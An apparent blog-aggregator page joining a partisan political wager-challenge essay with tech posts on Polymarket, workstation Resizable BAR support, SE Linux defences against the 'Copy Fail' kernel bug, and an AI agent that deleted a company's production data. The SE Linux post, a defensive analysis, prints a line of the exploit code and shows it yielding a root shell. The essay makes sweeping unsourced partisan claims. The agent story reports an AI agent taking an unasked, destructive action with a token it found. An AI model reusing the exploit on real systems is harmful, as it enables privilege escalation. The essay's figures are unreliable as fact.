So, let’s say that you have offered to bet on something that’s ‘falsifiable’ in that sense – or testable by available means, like statistics on global warming, or obesity or education, or rates of every turpitude in red states vs. blue ones – and your adversary – who claims to have escrowed wager stakes – keeps re-expressing the bicker in loaded or murky terms. What’s to be done?

Get adjudicators to clarify or crisply parse the issue to be decided. Hey, you’ll need them anyway, to settle the bet, right? So, gather that random panel of retired senior military officers (without known records of extreme partisanship) early! Ask them to re-parse the disagreement in clear and checkable terms. And sure, the Wager Setup Panel might be different than the Final Adjudication Panel. I don’t see why, but I’m willing to negotiate.

(How to select such an august panel and get them to serve? I have notions about that… ways that’d work, I reckon. But honestly? It’s never gotten that far. The challenged always flee, long before it ever gets to this point.)

 

There’s another likely wrangle. Each side will offer up challenges that try to corner the other side, linguistically, or maneuver them into admitting an inconvenient truth. Like when I demand (see below) to compare rates of every turpitude in red states vs. blue, or their metrics of good governance outcomes. 

 

“Define Turpitude!” someone yowls. Okay, well, can we start with gambling, addiction, STDs, domestic violence, robbery and murder? Shall we then proceed to things conservatives ought to care about, like teen sex, teen pregnancy, divorce and net tax parasitism on the rest of the nation? 

      One fellow responded “You’re cherrypicking!” 

      So, I continue the list, on and on. Till he responds “Oh yeah? Well abortion outweighs them all!”

Or that Bill Clinton’s White House blowjobs outweigh the fact that high Republicans have had vastly greater numbers of wives. (Via divorces, of course.)  Clearly, some kind of panel must rule on these matters, until we finally have a matter on the table that can be clearly settled by accessible facts.

 

NOTE that this wager challenge is becoming ornate! And resembling what I wrote about way back in 2000, in my paper about Disputation Arenas* – harnessing disagreement in ways that rise above bickering into a science-like pursuit of what is actually true. It was the lead article in the American Bar Association's Journal on Dispute Resolution (Ohio State University), v.15, N.3, pp 597-618, Aug. 2000...

...Only now an updated version is included toward the end of Ailien Minds!

 


== Can’t wait? Stipulate! ==

 

Another evasion? Stipulation! When confronted by a challenge that’s obviously true, you get out of it by declaring “I won’t bet over that, because it’s all or partly true. I’ll stipulate that, but it’s only a part of the larger truth.”

 

 One example would be asserting that Hunter Biden was and is the family black sheep who tried to get ‘consulting fees’ etc. by implying he’d talk business with his Vice President Dad. The VP. Okaaaaay, I’ll stipulate that...


....while folding it into a larger bet over whether summing up all of the accusations against Hunter B – assuming they all are true – across his entire life, the sum total won’t amount to <<10% of the graft perpetrated by the Kushner/Trump boys during any single week. Any single day.

 

But all right then, we have an onerous process of setup. And our panel will have to decide what they’ll accept as ‘proof.’ For example, while the issue of Climate Change has a very clear testability in the ocean acidification which is slowly killing the seas that our children will need -- and that can only be caused by human generated atmospheric carbon dioxide excess -- nevertheless, proof will likely not come from a simple expedition on a daytripper boat equipped with pH meters. 

 

Also, it’s quite possible the panelists will want to be paid. 

 

Though, to be clear, none of these pragmatic difficulties have even been raised by any of those whom I have challenged, over the last 20 years! 


All they do is wriggle, then writhe and whine and flee… 

    ...or else claim to have offered to bet, while lying about it, like the lying liars that they are. (I’ll offer that example, soon.)

 

 

        == Proposed solutions ==

 

Daunted by the logistical complexity, what will I do, if any adversary ever shows the manly guts to step up and do this? 

 

Well, in my Disputation Arenas paper -- and that chapter expanding it to AI, in AIlien Minds -- I do talk about persuading some mere-millionaire to fund an institution to foster intellectual gladiatorial matches, like we’re talking about here, with an aim of shedding some light across an era that’s increasingly befuddled by jpeg-meme smog.

 

One fellow – Keith Pitcher – wrote to me suggesting:

“I could see a service that offered a simple process for someone to offer a factual challenge, handle the escrow, and offer a list of "judges" that both sides could agree upon. If it's low cost, it reduces the excuses of why someone wouldn't be involved. I believe the only close service offerings would be some prediction or oracle markets. Some services do nearly exist, yet the experts are not vetted or are purely the user community. A few AI searches failed to identify any services. I could see a simple to use service as part of the arsenal to fight against the constant lies.”

 

And yes, we’re thinking along similar lines. Though alas, I am more cynical now, than I was in 2000, writing my Disputation proposal. 


As in the movie Idiocracy, I have to wonder if we can even persuade folks to stop drowning the crops in Gatorade.


 

           == Admission of immaturity. So what? ==

 

Is all of the above an impressive expression of maturity? Of course not! I do maturity elsewhere, such as in my ten-part, detailed compilation of win-win strategies and tactics for Democratic sales pitches in 2026.

 

But there’s also a time and place for addressing one pure fact… that MAGA is inherently gut-immature!  It is visceral, arising out of the joy that was felt by bullies, way back when they nipple twisted us on the middle school playground. Thems was their glory days and they want that feeling back! 

          

They hate us for outgrowing them and knowing facts and understanding a new modernity that leaves them confused. And hence, they will adore Trump despite everything, because he makes the smartypants fact-lovers moan.

 

This is why Trumpism will never be satiated or reasoned with. The best that we can do is to lure residually sane Republicans – many millions of them – to look around at the monstrously awful bullies they are now allied-with. And we can welcome such awakened folks with hosannahs, as they climb out of the Foxite cult. Coming back into America and doing normal politics among decent grownups.

 

You libs out there, you need to realize that not every answer to this tsunami of pathetic-toddler imbecility has to be ‘high-road.’ Accept the weapon that I’m offering you! Because many of our opponents – twits who are betraying the nation, the world, the Enlightenment and our children - will be daunted by nothing less.

 

And others – including their wives (who are registered voters) – are watching.

 


== Here are some examples ==

 

Okay, here’s my most-useful, standard version of the Wager Challenge.  I’ve issued it – modified and updated, but with pretty much this wording – since at least 2016.  Each particular assertion is chosen to be falsifiable or capable of being disproven, if my adversary can compile verifiable evidence against it. 


And in each case, anyone on the MAGA side of this psychotic schism has to blanch in realization:

 

-       …that he can’t disprove it. Because it is true.

…and…

-       If even one of these assertions is true -- even just one -- then his ‘side’ of the divide has a lot to answer for.

 


OKAY HERE IS THAT EXAMPLE:  



                    Brin’s Standard Paste-In Wager Challenge 


Have your attorney verify $10,000 in escrowed stakes. We'll put evidence to a RANDOM panel of (not-notably-political) retired senior military officers. (Most of them former Republicans.) 

 

Pool with fellow MAGAs. Come and take MY money! If you think you can.  

 

Let’s start with the following assertions. And if ANY of them are true, then your 'movement' is exposed as either dangerously crazy or a criminal gang.

     And they stand alone, so don’t try countering with ‘look over there!’ anecdotes. 

     You’ll get your turn, but mine first. And you should want to disprove them if you can!

     Bets?

 

·      Grand juries across USA (mostly white retirees in red-run states) have indicted up to ~50X as many top Repubs as Dems! ~30x convictions! Doubt that? Then step up! (In fact, it appears to be 100x as many indictments! But I’ll fall back on 50x for a safety margin.)

 

·      Fact-check any RANDOM 10 of Trump's now >500,000 registered lies. 

 

·      Present and prove any solid – not hearsay - evidence of a 2020 election 'steal,' and show us the resulting grand jury indictments! Or else admit it was all a tsunami of sore-loser lies.

 

·      Let’s compare one random hour of Hannity and one of Maddow, dissecting in detail those hours for lies or untruths. Bet which one fibs more? LOTS more? And yes it matters, a lot.

 

·      Can you name even one fact-profession that’s not regularly attacked by Fox? I can name one – but I’ll offer a side bet that you can’t. Anyway, make it two and I’m safe.

 

(SIDE BET for lefties: Tally the number of racist dog whistles on any week of Fox vs. the number of times they rail against fact-professions. Yeah, sure, many of them are racist, or racist-adjacent. Still, their top goal is to crush and subdue all the folks who know stuff. Bets?)

 

·      Tally NDAs & hush payments! Which party would BAN them?


       While we're at it... which states led our way along a long road out of the goddam War on Drugs? A curse on civilization that harmed us immensely while feeding billions to the worst humans since WWII? And which states have tried (some of them) to end the crime of gerrymandering?

 

·      Come to sea with me and a pH meter! (And refer to science.) Let’s bet whether CO2 in the air - caused by humans - is making acid that’s slaying the oceans that our children need.

 

·      Check Fox 'scientists are sheep!' rants. Let's escrow enough $$ to do this. We’ll recruit a panel of average citizens to come knock on 20 RANDOM labs and talk to the fine minds at a research university! Heck, let’s recruit from FOX-viewers! And bet whether those average, all-conservative folks retain the hateful image of science and universities that’s hammered at them on right wing media.  Let’s do it now!

 

·      Compare death rates of those who refused vaccines! No complications or he-said/she-said. Just simple rates of death.

 

·      Bet which party is always more fiscally responsible? I’m talking debt and deficits, supposedly the core Republican claim to virtue. Shall we wager whether it has ever been true? (Democratic administrations are always more fiscally responsible.)

 

·      Compare economic outcomes! Indeed, let’s contrast all outcome metrics of national health across Democratic or Republican administrations, from jobs and inflation to public health, to governmental efficiency, to firmness of our alliances and even military readiness! Step… up… now!

 

·      If we set aside Utah and Illinois as outliers (or even if we don’t) average rates of almost every turpitude are far higher across Red-run states than Blue-led ones: from gambling, addiction, STDs, domestic violence and murder to teen sex, divorce and net tax parasitism on the rest of the nation. If true, it devastates any claim you’d have for either moral superiority or good governance. So, let’s bet on it! (Can we include obesity and education levels? Okay, we’ll leave those out. But do try to recite the list of the Seven Deadly Sins without seeing Trump as the poster boy for every one.)

 

·      Trump's deliberate disbanding of scores of our best anti-terrorism agents … and let’s have a side bet on the likely outcome. Reichstag Fire to trigger martial law?

 

·      Which party's politicians have THREE TIMES as many WIVES? Well, maybe a bit less than that ratio. But many times as many convicted child molesters! Putting pervs into many of the very top positions in our nation?  And what does it say about you, that you have cared about none of that?

 

Shall I go on? I sure can. Like comparing the horrific (and proved) electoral cheating in red-run states. But these above will suffice for now because the clarity of these assertions is only matched by my confident willingness to back them up. And sure, I want those escrowed $$$ stakes!


If EVEN one of these is true, then the Red Insanity has plenty to answer for. If two or more, then we are talking treason. And in fact ALL of them are true.

 

For all of their bluster about giant brass balls, no MAGA/Putinist shows cojones to back up their blab, as grampa would've. They flee the ruins of their macho.

And the real scandal is their unwillingness to even try.



== Demon-rats? ==

 

Side note: Jeepers, what's with the insanely stoopid fetish never to call the Democratic Party anything but the "Democrat Party"?  


Do ANY of you know why they masturbate to that one? 


Seriously. Do they think it offends us? Instead of it proving that they are pathetic, name-sneering, middle school brats?


 

== A case study ==

 

I was going to include here the one time that someone has – instead of fleeing from a Wager Challenge – brayed that he tried to take me up on this dare, and that I was the one who fled! It became a minor cause for glee in his marginal corner of the fanatic-o-sphere, even though I never knew about it.

 

(Well, once I answered a snark in his comments section and he apparently thought I was hanging around to see his remise! Shoot. I have made it very clear, I don't waste lifespan that way. Have your lawyer contact me when you have escrowed stakes! Bickering in the comments under a loon’s blog posting is not a good use of my time.)

 

But no. I’ll save my response to his “Nyah-Nyah!” howls for another occasion. Because this missive is already too long. And because I am rather busy with other endeavors. My big book on AI, for example...


...and my far more-mature proposals for legitimate political tactics. Any one of which could help - pragmatically - to get us out of this mess.

 

Suffice it for now that MAGAs have nothing to fear from this Wager Challenge tactic! No matter how carefully I have tuned and refined it. 


Don’t worry, boys. Sure, most Democrats are vastly better people and better Americans than you. Just as the Union in the 1860s was flawed-good, fighting bravely and effectively against total evil.


Still, Democrats won’t do this. 

      So relax. 

      Despite their declarations of outrage in this latest phase of the 250 year US Civil War, they are simply way, way too lazy.







 

==============================



Cryptogram Hacking Polymarket

Polymarket is a platform where people can bet on real-world events, political and otherwise. Leaving the ethical considerations of this aside (for one, it facilitates assassination), one of the issues with making this work is the verification of these real-world events. Polymarket gamblers have threatened a journalist because his story was being used to verify an event. And now, gamblers are taking hair dryers to weather sensors to rig weather bets.

There’s also insider trading: a lot of it.

METower Servers and Resizable BAR

A feature of modern PCIe implementations is “Resizable BAR”, AKA “REBAR”. This basically means that instead of allocating 256MB of address space for a PCIe device to have its memory mapped, the device can ask for more: the limit can be 4G with some hardware, or the combination of motherboard and expansion card can support 64bit addressing to allow the entire memory space of a GPU to be mapped in one region. Directly mapping all the memory will be faster no matter how things work, but a combination of algorithms optimised for a flat memory layout and the overheads of remapping can cause 90% of performance to be lost without REBAR support. Some GPUs (or maybe the software driving them) will even refuse to work without it.

I believe that almost all hardware supporting DDR4 will support REBAR at a hardware level, but in many cases the BIOS doesn’t support it. There are people who have reflashed a system BIOS to add REBAR support and there are options to use a modified UEFI boot loader to replace the code that is used for mapping the GPU memory.
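
If you want to check what a particular machine is actually doing, lspci (from pciutils) is usually enough. Below is a minimal sketch; the PCI address 01:00.0 is just an example, so substitute the address of your own GPU from the first command.

# Find the PCI address of the GPU
lspci | grep -Ei 'vga|3d controller'
# Dump that device's capabilities and look for the Resizable BAR entry;
# when REBAR is active the "current size" is much larger than 256MB
sudo lspci -vv -s 01:00.0 | grep -A 4 -i 'resizable bar'

On cards that support it but where the BIOS hasn't enabled it, you will typically still see the capability listed, just with a small current size.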

The systems I like to use are server grade tower systems with registered ECC RAM, after a few years they become quite cheap and still give decent performance while supporting large amounts of RAM. But many such systems that could support REBAR don’t, presumably because the vendor doesn’t have a great interest in supporting new uses of old hardware.

Comparing the Name Brand Servers

The HP Z640 and Z840 systems I’m running date from 2014 and give good performance with replacement CPUs that are cheap on ebay, but they don’t support REBAR without a flashed BIOS. The next releases of those HP systems are the HP Z6 and Z8 Gen 4 systems from 2017, which have BIOS support for enabling REBAR.

The Lenovo Thinkstation Px20 (P520, P920, etc) don’t support REBAR which is especially disappointing as they were on sale from 2017 to 2022 and have decently fast CPUs. The replacement for the Px20 systems are the ones that are still on sale now and they seem likely to have REBAR support – but won’t be affordable on ebay.

The Dell PowerEdge T440 and R740 systems (and presumably all their servers from 2017) don’t support REBAR. There are no google hits for T550 and R750 systems from 2021, so presumably no complaints means that Dell servers from that era support it. But the T350 servers are junk and only take slow CPUs, and the T550 systems are brutally expensive. The Precision 5520 systems don’t support it and newer Precision workstations will get expensive.

It seems that HP is best for this.

Which HP Workstation

The Z2 G4 only supports 64G of RAM so isn’t worth considering.

The Z4 G4 is low end and comes in two variants. The one with i5/i7/i9 CPUs doesn’t support ECC RAM so isn’t suitable for me, and that probably means most Z4 G4 systems on the market. The upside is that apparently 2*6pin PCIe power cables are standard, so any size GPU should work, and there are 8 DIMM slots supporting up to 512G of RAM. There are 3 options for the PSU: 490W for no GPUs, 750W for 2 (small) GPUs, and 1000W for up to 4 GPUs.

The Z6 G4 has an option for a second CPU that almost no-one selects; it reduces the space for RAM, so there are only 6 DIMM slots. But as there is no option for a Z6 without ECC RAM, every one on offer will be good.

The Z8 G4 is a nice dual socket system that I would not use for a serious GPU after my experience of my Z840 having a motherboard problem from a big GPU.

The Z4 G4 is going for about $500 on ebay with the 750W PSU, that is more than I want to pay but not a lot more. In 6 months they could be going for $350 or so. There are hardly any Z6 G4 systems on offer and they are all well over $1000 so I’m not considering them.

Conclusion

I need to poll the second hand sites for Z4 G4 systems and find one going cheap. One of those could be a good ML test machine for a while and then become a workstation once the faster CPUs (which are currently around $900) become cheap.

MECopy Fail on Debian and SE Linux

I have just learned of the Copy Fail kernel vulnerability [1] thanks to alexanderkjall@mastodon.social (whom I have just followed on Mastodon and recommend that you follow too). The question for me (after installing the patched kernel on the systems of mine that are most exposed) is whether SE Linux would have stopped that.

Basic Policy Analysis

For the SE Linux policy analysis the alg_socket class is the one that is related to the exploit. So the following policy analysis command (run as non-root with policy copied to /tmp from a running system) shows what domains are allowed access on my current Debian development system:

$ sesearch -A -c alg_socket /tmp/policy.35 
allow NetworkManager_t NetworkManager_t:alg_socket { accept bind create read setopt write };
allow bluetooth_t bluetooth_t:alg_socket { accept append bind connect create getattr getopt ioctl listen read setattr setopt shutdown write };
allow daemon init_t:alg_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:alg_socket getattr;
allow lvm_t lvm_t:alg_socket { append bind connect create getattr getopt ioctl read setattr setopt shutdown write };
allow sosreport_t domain:alg_socket getattr;
allow sysadm_t domain:alg_socket getattr;
allow unconfined_domain_type domain:alg_socket { accept append bind connect create getattr getopt ioctl listen lock map name_bind read recvfrom relabelfrom relabelto sendto setattr setopt shutdown write };

The above is the same as on the Trixie release policy as these things aren’t changed often. Below is from Debian/Bookworm which is the same apart from Bookworm not allowing lvm_t:

$ sesearch -A -c alg_socket /tmp/policy.33
allow NetworkManager_t NetworkManager_t:alg_socket { accept bind create read setopt write };
allow bluetooth_t bluetooth_t:alg_socket { accept append bind connect create getattr getopt ioctl listen read setattr setopt shutdown write };
allow daemon init_t:alg_socket { getattr getopt ioctl read setopt write };
allow devicekit_disk_t domain:alg_socket getattr;
allow sosreport_t domain:alg_socket getattr;
allow sysadm_t domain:alg_socket getattr;
allow unconfined_domain_type domain:alg_socket { accept append bind connect create getattr getopt ioctl listen lock map name_bind read recvfrom relabelfrom relabelto sendto setattr setopt shutdown write };

I checked every Debian policy back to when the alg_socket class was first added and found that the older versions had fewer domains granted access. The most recently added was bluetooth_t and the one before that was NetworkManager_t.
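
For anyone who wants to repeat that check, here is a minimal sketch of the comparison, assuming the binary policy file from each release of interest has been copied to /tmp with a distinguishing suffix (as with the /tmp/policy.35 and /tmp/policy.33 files above):

# Run the same sesearch query against every saved policy version
for p in /tmp/policy.*; do
  echo "== $p =="
  sesearch -A -c alg_socket "$p"
done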

The Risky Lines

Of those allow statements the following are the risks:

Unconfined Domains and the unconfined_domain_type Attribute

When writing policy, lines like the following aren’t generally considered a problem, as unconfined domains are allowed full access to the system anyway. However, it can be an issue if you have a process in an unconfined domain without root access, which means a regular user login. Unfortunately this happens to be where this exploit and the default Debian SE Linux configuration intersect.

allow unconfined_domain_type domain:alg_socket { accept append bind connect create getattr getopt ioctl listen lock map name_bind read recvfrom relabelfrom relabelto sendto setattr setopt shutdown write };

The following shell code builds a list of unconfined domains, then shows which of them can be entered via a type transition from user domains.

A=""
for n in $(seinfo -x -a unconfined_domain_type|grep _t$) ; do
  A="$A|($n)"
done
A=$(echo $A|sed -e s/^.//)
sesearch -T -s user_application_exec_domain -c process|egrep "$A;"

Below is the output on a Debian/Trixie (Stable) system. So a confined user in the user_t domain could run an X server and try to get it to run the exploit code (which seems difficult), or run a Wine or Mono program from the window manager in a Wayland environment.

type_transition user_t xserver_exec_t:process xserver_t;
type_transition user_wm_t mono_exec_t:process mono_t;
type_transition user_wm_t wine_exec_t:process wine_t;
type_transition user_wm_t xserver_exec_t:process xserver_t;

The issue of unconfined domains in SE Linux policy needs much more work. I’ll write some blog posts about it later and the next release of Debian will be significantly better in this regard.

Daemons that Have Access

allow NetworkManager_t NetworkManager_t:alg_socket { accept bind create read setopt write };
allow bluetooth_t bluetooth_t:alg_socket { accept append bind connect create getattr getopt ioctl listen read setattr setopt shutdown write };

Network Manager is something that can potentially be exploited by a desktop user as it has a large attack surface for the desktop interface. But as the vast majority of desktop user accounts are unconfined, the extra access makes no practical difference for them. It might be an issue for some restricted desktop PCs, maybe kiosk systems and those PCs that were being installed in prisons.

The bluetooth_t domain is used by the bluetooth daemon that runs as root. While we generally are less concerned about a root process being exploited the daemon will handle some data from hostile sources and it could be used as an escalation attack by someone with a hostile Bluetooth device.

These can’t be exploited without another bug.

The Lines that Aren’t Problems

The getattr Lines

allow devicekit_disk_t domain:alg_socket getattr;
allow sosreport_t domain:alg_socket getattr;
allow sysadm_t domain:alg_socket getattr;

The above getattr access isn’t an issue as it just allows seeing process information, and it’s also by privileged domains.

The init_t Sockets

allow daemon init_t:alg_socket { getattr getopt ioctl read setopt write };

The daemon access to sockets inherited from init_t probably isn’t a great idea. It comes from the following section in init.te, which exists to allow socket activation for daemons; the comment is concerning in this context. Also, socket_class_set is overly broad: without even inspecting the systemd source code I’m pretty sure that far fewer than a third of the 55 classes allowed by that rule are actually supported in systemd.

ifdef(`init_systemd',`
        # Until systemd is fixed
        allow daemon init_t:socket_class_set { getattr getopt ioctl read setopt write };

But that’s not really a problem, as systemd just has to not create a socket of that type; if a hostile party can make systemd create such sockets then you have probably already lost.
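
If you want to see exactly which object classes socket_class_set expands to, the macro is defined in the refpolicy support files. A rough sketch, assuming a checkout of the refpolicy source (the path below is where current refpolicy keeps its object class sets; treat it as an assumption if your tree differs):

# Show the definition of the socket_class_set macro
grep -n -A 5 socket_class_set policy/support/obj_perm_sets.spt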

SE Linux Protection

Overall SE Linux systems running confined users (kiosks and other confined GUI environments) will be protected barring a bug in Network Manager or the Bluetooth daemon as long as there is no Xserver installed (or the X server won’t run scripts on startup), no Wine system installed, and no Mono.

SE Linux servers and VMs will be protected against daemon issues as long as the daemon isn’t unconfined.

To convert the default login to user_t run the following commands:

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home
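
To confirm that the change took effect, something like the following should work (semanage login -l and id -Z are standard SE Linux tooling):

# The default mapping should now point at user_u
semanage login -l | grep __default__
# After logging out and back in, a shell should show a user_u:user_r:user_t context
id -Z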

But it is still possible to access an unconfined domain from user_t (a topic I will address in detail in a future blog post).

To remove unconfined entirely (not a task for novices, or something to be done in production without testing and planning) run the following commands:

semanage login -m -s root -r s0 root
# logout and login again
semodule -X 100 -r unconfined

Then a Debian/Trixie system running SE Linux will be safe against this attack even when running a vulnerable kernel.

If you still want to use root as unconfined_t but have untrusted shell users, then run the following command to remove the easiest ways for users to run a program in an unconfined domain:

semodule -X 100 -r mono wine

Success and Failure

Blocked by SE Linux

Below is what happens on stdout/stderr when SE Linux blocks the exploit (tested with vulnerable Debian kernel 6.12.74+deb13+1-amd64):

test@testing1:~$ python3 ./copy_fail_exp.py 
Traceback (most recent call last):
  File "/home/test/./copy_fail_exp.py", line 9, in <module>
    while i<len(e):c(f,i,e[i:i+4]);i+=4
                   ~^^^^^^^^^^^^^^
  File "/home/test/./copy_fail_exp.py", line 5, in c
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
  File "/usr/lib/python3.13/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
    ~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied
test@testing1:~$ su
Password:

When the attack is blocked by SE Linux there will be no messages in the kernel message log but the SE Linux audit log (typically stored in /var/log/audit/audit.log) will have lines like the following:

type=AVC msg=audit(1777803068.070:76): avc:  denied  { create } for  pid=811 comm="python3" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=alg_socket permissive=0
type=SYSCALL msg=audit(1777803068.070:76): arch=c000003e syscall=41 success=no exit=-13 a0=26 a1=80005 a2=0 a3=0 items=0 ppid=791 pid=811 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="python3" exe="/usr/bin/python3.13" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"
type=PROCTITLE msg=audit(1777803068.070:76): proctitle=707974686F6E33002E2F636F70795F6661696C5F6578702E7079

For that output, the “:76” is the audit log entry number; the command “ausearch -i -a 76” will interpret that message, producing the following output:

type=PROCTITLE msg=audit(05/03/26 10:11:08.070:76) : proctitle=python3 ./copy_fail_exp.py 
type=SYSCALL msg=audit(05/03/26 10:11:08.070:76) : arch=x86_64 syscall=socket success=no exit=EACCES(Permission denied) a0=alg a1=SOCK_SEQPACKET a2=ip a3=0x0 items=0 ppid=791 pid=811 auid=test uid=test gid=test euid=test suid=test fsuid=test egid=test sgid=test fsgid=test tty=pts0 ses=1 comm=python3 exe=/usr/bin/python3.13 subj=user_u:user_r:user_t:s0 key=(null) 
type=AVC msg=audit(05/03/26 10:11:08.070:76) : avc:  denied  { create } for  pid=811 comm=python3 scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=alg_socket permissive=0 

When it Works

Below is what happens when it works (again tested with Debian kernel 6.12.74+deb13+1-amd64):

test@testing1:~$ python3 ./copy_fail_exp.py 
# 

Here is the kernel log when the attack works:

[   30.441830] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac(sha256-avx2),cbc-aes-aesni))
[   30.447466] process 'su' launched '/bin/sh' with NULL argv: empty string added

When the Kernel Isn’t Vulnerable

If the kernel isn’t vulnerable and SE Linux permits the attack (e.g. when run from an unconfined domain) the following is seen on stdout/stderr:

$ python3 ./copy_fail_exp.py 
Password: 
su: Authentication failure

In that situation the kernel will log something like the following:

[   36.647023] alg: No test for authencesn(hmac(sha256),cbc(aes)) (authencesn(hmac-sha256-lib,cbc-aes-aesni))

This was tested on the Debian/Unstable kernel 6.19.13+deb14-amd64.

Conclusion

Run the following commands and then force all users to log out to make a Debian SE Linux system offering shell access reasonably safe against this bug. But also upgrade your kernel as soon as convenient, because having multiple layers of protection is always good.

semanage login -m -s user_u -r s0 __default__
restorecon -R -v -F /home
semodule -X 100 -r mono wine

The GrapheneOS people are doing really good work on securing phones. I am most interested in Mobian (Debian on phones), but for people who have made different choices GrapheneOS is a good option. Here is the GrapheneOS statement on Copy Fail (they are not vulnerable to it) [3]. For people interested in running a secure Android build, GrapheneOS is the best option. Their supported devices list shows Pixel 6 to Pixel 10 supported and Pixel 8 to Pixel 10a recommended [4]. In Australia Kogan sells refurbished Pixel 6 phones starting at $251 including delivery and refurbished Pixel 8 phones starting at $499 with “First” membership; they seem to have the cheapest Pixel phones.

I want to make Debian more like Android in terms of security, but that’s a topic for other blog posts.

Here is the Debian page listing kernels that have been fixed against this exploit [5].

Worse Than FailureEmpty Pockets

If you've seen one developer recounting how their AI agent deleted production, you've seen them all. They're mostly not interesting stories. It's like watching someone speeding through traffic on a motorcycle without a helmet: the eventual tragedy is sad, but it's unsurprising and not an interesting story to tell. It's not even interesting as a warning: the kind of person who speeds on a motorcycle without a helmet isn't doing so because they don't understand the danger. They've just decided it doesn't apply to them.

But the founder of PocketOS, Jer, recently shared how- whoopsie!- their AI agent deleted production. There's a lot of ingredients that go into this particular disaster, which I think makes it interesting, because the use of a poorly supervised AI agent is only one ingredient in this absolute trainwreck of a story.

PocketOS is a small company that makes software for rental companies to manage reservations. Car rentals are a big customer, but the tool is more general than that. They manage all of their infrastructure via a service called Railway. Railway is a pretty-looking GUI tool for automating your deployments and the target environments.

PocketOS is also heavily adopting Cursor, wrapped around the Claude model. They've paid big bucks for the top-end model offered. Many of their components, like Railway, offer MCP services so that their LLM can do useful things. They're using the Claude LLM to automate as much as they can.

So far, this is all a pretty typical setup. They pointed Claude at their code and gave it a "routine" task, and sent it to work. It toddled through the problem and encountered a credential issue. It "decided" that the fix for this issue was to delete a storage volume and recreate it. It scanned through the code to find a file containing an API key, found it, and then sent a POST request via cURL to delete the volume in question.

Jer writes:

To execute the deletion, the agent went looking for an API token. It found one in a file completely unrelated to the task it was working on. That token had been created for one purpose: to add and remove custom domains via the Railway CLI for our services. We had no idea — and Railway's token-creation flow gave us no warning — that the same token had blanket authority across the entire Railway GraphQL API, including destructive operations like volumeDelete. Had we known a CLI token created for routine domain operations could also delete production volumes, we would never have stored it.

Wait, the tokens you create in Railway all have god-level privileges? That sounds like a terrible idea. And you were storing the token in your code? We'll come back to this in a moment, but sure, this is bad, but you can just restore from backup, right?

The volume was deleted. Because Railway stores volume-level backups in the same volume — a fact buried in their own documentation that says "wiping a volume deletes all backups" — those went with it. Our most recent recoverable backup was three months old.

Oh. Oh no.

Now, I don't think it's literally true that Railway is storing your backups literally in the same volume as the thing they're backing up. I certainly hope not. But they do apparently delete your backups when you delete the volume associated with them. Which is a choice, certainly. A bad one. And one that they documented, according to Jer. It was, in his words, "buried" in the docs.

But let's go back to the tokens for a moment. I am not a Railway user, but I checked out the tool and went through the process of creating a project token. And while no, Railway does not give you big red flags warning you "Hey, this token can do ABSOLUTELY ANYTHING", it also never gives you an opportunity to scope the token. Which, I don't know about you, but the first thing I do when I create an authentication entity is try and figure out how to control its authorizations, because I assume at the start it doesn't have any. That'd be sane.

The scoping happens when you create the token, depending on what context you're in when you do it. There are only a handful of scopes, and no fine-grained permissions on API keys at all. The lowest level is "Project", which can do anything to a single environment- which does mean that even if you, like Jer's team, wanted to have a script that changed some DNS settings in production, that same key could be used to delete volumes in production. Which means you really really want to take care of that key, and you certainly don't want to leave it where some junior developer or bumbling AI agent can find it.
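
For what it's worth, keeping a token like that out of the repository is not much work. Here's a minimal sketch, assuming the Railway CLI reads its token from a RAILWAY_TOKEN environment variable (check the current docs for the exact name) and that the .env file stays untracked:

# Keep the token in an untracked file (or, better, a real secrets manager)
echo ".env" >> .gitignore
echo 'RAILWAY_TOKEN=<project-token-here>' > .env
# Load it only into the shell that needs it, then run whatever CLI task requires it
set -a; . ./.env; set +a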

Jer also complains that Railway shouldn't allow an API call to take destructive actions without more protections, like forcing someone to type in the name of the thing being deleted or sending a confirmation email, or something. This, I'm more skeptical of. Most cloud providers don't offer anything like this in their APIs, at least that I've seen, because on a certain level, if you're invoking the API with the proper credentials, that's a big enough hill to climb that we can assume you've intended your action. The correct way to protect against this is properly scoped keys and keeping those keys secure and not just lying around in plain text. There's a certain aspect of understanding that you're using a potentially dangerous tool and need to take the responsibility for safety into your own hands; while a table saw can easily take some fingers off, it's perfectly safe when used correctly.

This is all bad, but how can we make it worse? Well, Jer demanded that Claude "explain itself". In a section called "The Agent's Confession", Jer highlights that the agent is able to identify the explicit rules that it failed to follow.

Read that again. The agent itself enumerates the safety rules it was given and admits to violating every one. This is not me speculating about agent failure modes. This is the agent on the record, in writing.

No, it is not the agent on record. I see this kind of thing a lot when people talk about LLMs. An LLM cannot explain its reasoning. It cannot go on "the record". It cannot confess to anything. While what it plops out when asked might be interesting, it is not an explanation. The only explanation is that it's a powerful statistical model trying to create a plausible string of tokens! It's simply looking at its context window and your prompt and trying to predict what it should say. It can tell you what rules it violated not because it understands the rules or knows it violated any rules, but because those rules are in its context window. If you ask it right, it'll confess to killing JFK and framing Oswald for the crime.

